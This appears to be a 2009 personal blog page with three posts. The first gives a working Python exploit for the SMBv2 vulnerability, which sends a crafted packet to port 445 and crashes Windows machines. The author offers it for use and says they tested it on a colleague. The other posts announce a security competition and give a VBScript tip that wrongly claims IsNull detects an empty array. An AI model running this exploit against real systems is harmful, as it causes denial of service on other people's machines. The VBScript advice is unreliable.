Sep/090
Microsoft SMB2 Vulnerability update.
Microsoft has released a news update with links to a "Microsoft Fix It" package that will disable SMBv2 until a proper patch is released. Check out http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx to read.
For those of you that do not know what I'm talking about, by using a specially created packet an attacker can exploit a bug in SMBv2 (the protocol that Microsoft File and Print Sharing relies on) and cause a system to blue screen and reboot.
I have tested this myself and it has worked every time..sorry Chaim.
Below is the code that I have been using to to actually exploit this vulnerability. Use with caution and don't be malicious. I take no responsibility for your shenanigans.
This code came from milw0rm.
#!/usr/bin/python
from socket import *
from time import sleep
hosty = "ip.of.target.machine"
print hosty
host = hosty, 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26" # Process ID High: normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.settimeout(1)
s.connect(host)
s.send(buff)
s.close()
Sep/090
Some updates!
Hey everyone,
Just thought I would update everyone on the different projects I have been working on lately.
School has started again and I now have a week of grad school under the belt, nothing to hard or exciting with that.
I have though been working on redesigning and planning SPARSA's 7th Information Security Talent Search which will be held in March 2010. The old ISTS that has occured for the past 6 years has been scrapped and I have redesigned the entire competition to bring new challenges and excitement to an already awesome competition. This year will be the biggest and baddest ISTS yet. Once I finish rewriting the registration website, I will be opeeing up registration to everyone! Stay tuned for more information as more and more work gets finished up.
Stay tuned for more updates coming soon!
Sep/090
Detect empty arrays in VBScript
So for those of you who have tried to determine the size of an array in VBScript and have failed this may be for you. I recently needed to be able to determine if an array was size 0 in VBscript and was running into some issues.
VBScript does not have a .SizeOf() function that you can execute on an array to determine it's size. Normally what I would do in most other languages is something like the following:
if sizeof(array) = 0
{
//do something here
}
To accomplish this in VBScript you need to do the following.
If IsNull(array) Then
//Do Something Here
End If
Why can't you do things like the rest of the world VBScript!!!!! That is all.